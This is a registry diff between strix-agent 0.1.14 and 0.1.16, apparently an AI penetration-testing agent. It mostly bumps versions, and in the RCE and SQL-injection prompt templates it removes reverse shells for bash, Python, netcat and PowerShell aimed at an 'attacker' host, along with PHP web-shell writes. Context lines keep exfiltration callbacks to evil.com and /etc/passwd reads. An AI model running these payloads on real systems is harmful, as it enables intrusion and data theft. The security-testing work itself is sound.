strix-agent 0.1.14__tar.gz → 0.1.16__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of strix-agent might be problematic. Click here for more details.

Files changed (98) hide show
  1. {strix_agent-0.1.14 → strix_agent-0.1.16}/PKG-INFO +1 -1
  2. {strix_agent-0.1.14 → strix_agent-0.1.16}/pyproject.toml +1 -1
  3. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/rce.jinja +2 -18
  4. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/sql_injection.jinja +0 -1
  5. {strix_agent-0.1.14 → strix_agent-0.1.16}/LICENSE +0 -0
  6. {strix_agent-0.1.14 → strix_agent-0.1.16}/README.md +0 -0
  7. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/__init__.py +0 -0
  8. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/agents/StrixAgent/__init__.py +0 -0
  9. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/agents/StrixAgent/strix_agent.py +0 -0
  10. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/agents/StrixAgent/system_prompt.jinja +0 -0
  11. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/agents/__init__.py +0 -0
  12. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/agents/base_agent.py +0 -0
  13. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/agents/state.py +0 -0
  14. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/__init__.py +0 -0
  15. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/app.py +0 -0
  16. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/assets/cli.tcss +0 -0
  17. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/main.py +0 -0
  18. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/__init__.py +0 -0
  19. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/agents_graph_renderer.py +0 -0
  20. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/base_renderer.py +0 -0
  21. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/browser_renderer.py +0 -0
  22. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/file_edit_renderer.py +0 -0
  23. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/finish_renderer.py +0 -0
  24. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/notes_renderer.py +0 -0
  25. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/proxy_renderer.py +0 -0
  26. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/python_renderer.py +0 -0
  27. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/registry.py +0 -0
  28. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/reporting_renderer.py +0 -0
  29. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/scan_info_renderer.py +0 -0
  30. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/terminal_renderer.py +0 -0
  31. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/thinking_renderer.py +0 -0
  32. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/user_message_renderer.py +0 -0
  33. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/web_search_renderer.py +0 -0
  34. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tracer.py +0 -0
  35. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/llm/__init__.py +0 -0
  36. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/llm/config.py +0 -0
  37. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/llm/llm.py +0 -0
  38. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/llm/memory_compressor.py +0 -0
  39. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/llm/request_queue.py +0 -0
  40. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/llm/utils.py +0 -0
  41. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/__init__.py +0 -0
  42. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/coordination/root_agent.jinja +0 -0
  43. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/authentication_jwt.jinja +0 -0
  44. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/business_logic.jinja +0 -0
  45. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/csrf.jinja +0 -0
  46. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/idor.jinja +0 -0
  47. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/race_conditions.jinja +0 -0
  48. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/ssrf.jinja +0 -0
  49. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/xss.jinja +0 -0
  50. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/xxe.jinja +0 -0
  51. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/runtime/__init__.py +0 -0
  52. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/runtime/docker_runtime.py +0 -0
  53. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/runtime/runtime.py +0 -0
  54. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/runtime/tool_server.py +0 -0
  55. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/__init__.py +0 -0
  56. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/agents_graph/__init__.py +0 -0
  57. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/agents_graph/agents_graph_actions.py +0 -0
  58. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/agents_graph/agents_graph_actions_schema.xml +0 -0
  59. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/argument_parser.py +0 -0
  60. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/browser/__init__.py +0 -0
  61. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/browser/browser_actions.py +0 -0
  62. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/browser/browser_actions_schema.xml +0 -0
  63. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/browser/browser_instance.py +0 -0
  64. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/browser/tab_manager.py +0 -0
  65. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/executor.py +0 -0
  66. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/file_edit/__init__.py +0 -0
  67. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/file_edit/file_edit_actions.py +0 -0
  68. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/file_edit/file_edit_actions_schema.xml +0 -0
  69. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/finish/__init__.py +0 -0
  70. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/finish/finish_actions.py +0 -0
  71. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/finish/finish_actions_schema.xml +0 -0
  72. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/notes/__init__.py +0 -0
  73. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/notes/notes_actions.py +0 -0
  74. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/notes/notes_actions_schema.xml +0 -0
  75. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/proxy/__init__.py +0 -0
  76. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/proxy/proxy_actions.py +0 -0
  77. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/proxy/proxy_actions_schema.xml +0 -0
  78. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/proxy/proxy_manager.py +0 -0
  79. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/python/__init__.py +0 -0
  80. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/python/python_actions.py +0 -0
  81. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/python/python_actions_schema.xml +0 -0
  82. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/python/python_instance.py +0 -0
  83. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/python/python_manager.py +0 -0
  84. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/registry.py +0 -0
  85. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/reporting/__init__.py +0 -0
  86. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/reporting/reporting_actions.py +0 -0
  87. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/reporting/reporting_actions_schema.xml +0 -0
  88. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/terminal/__init__.py +0 -0
  89. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/terminal/terminal_actions.py +0 -0
  90. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/terminal/terminal_actions_schema.xml +0 -0
  91. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/terminal/terminal_manager.py +0 -0
  92. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/terminal/terminal_session.py +0 -0
  93. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/thinking/__init__.py +0 -0
  94. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/thinking/thinking_actions.py +0 -0
  95. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/thinking/thinking_actions_schema.xml +0 -0
  96. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/web_search/__init__.py +0 -0
  97. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/web_search/web_search_actions.py +0 -0
  98. {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/web_search/web_search_actions_schema.xml +0 -0
{strix_agent-0.1.14 → strix_agent-0.1.16}/PKG-INFO RENAMED
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.3
2
2
  Name: strix-agent
3
- Version: 0.1.14
3
+ Version: 0.1.16
4
4
  Summary: Open-source AI Hackers for your apps
5
5
  License: Apache-2.0
6
6
  Keywords: cybersecurity,security,vulnerability,scanner,pentest,agent,ai,cli
{strix_agent-0.1.14 → strix_agent-0.1.16}/pyproject.toml RENAMED
@@ -1,6 +1,6 @@
1
1
  [tool.poetry]
2
2
  name = "strix-agent"
3
- version = "0.1.14"
3
+ version = "0.1.16"
4
4
  description = "Open-source AI Hackers for your apps"
5
5
  authors = ["Strix <hi@usestrix.com>"]
6
6
  readme = "README.md"
{strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/rce.jinja RENAMED
@@ -59,7 +59,7 @@ ${IFS}id
59
59
 
60
60
  <language_specific_rce>
61
61
  <php>
62
- - eval($_GET['cmd'])
62
+ - eval() with user input
63
63
  - system(), exec(), shell_exec(), passthru()
64
64
  - preg_replace with /e modifier
65
65
  - assert() with string input
@@ -101,7 +101,7 @@ Works in multiple contexts:
101
101
  - DNS exfiltration: $(whoami).evil.com
102
102
  - HTTP callbacks: curl evil.com/$(id)
103
103
  - Time delays for boolean extraction
104
- - Write to web root: echo '<?php system($_GET["cmd"]); ?>' > /var/www/shell.php
104
+ - Write to web root
105
105
  </blind_rce>
106
106
 
107
107
  <chained_exploitation>
@@ -163,22 +163,6 @@ concat:|file:///etc/passwd
163
163
  - Path traversal: /usr/bin/id vs id
164
164
  </waf_bypasses>
165
165
 
166
- <post_exploitation>
167
- <reverse_shells>
168
- Bash: bash -i >& /dev/tcp/attacker/4444 0>&1
169
- Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
170
- Netcat: nc -e /bin/sh attacker 4444
171
- PowerShell: $client = New-Object System.Net.Sockets.TCPClient("attacker",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
172
- </reverse_shells>
173
-
174
- <persistence>
175
- - Cron jobs
176
- - SSH keys
177
- - Web shells
178
- - Systemd services
179
- </persistence>
180
- </post_exploitation>
181
-
182
166
  <validation>
183
167
  To confirm RCE:
184
168
  1. Execute unique command (id, hostname)
{strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/sql_injection.jinja RENAMED
@@ -82,7 +82,6 @@ PostgreSQL:
82
82
  <file_operations>
83
83
  MySQL:
84
84
  ' UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
85
- ' UNION SELECT 1,2,'<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'--
86
85
 
87
86
  MSSQL:
88
87
  '; EXEC xp_cmdshell 'type C:\Windows\win.ini'--
{strix_agent-0.1.14 → strix_agent-0.1.16}/LICENSE RENAMED
File without changes
{strix_agent-0.1.14 → strix_agent-0.1.16}/README.md RENAMED
File without changes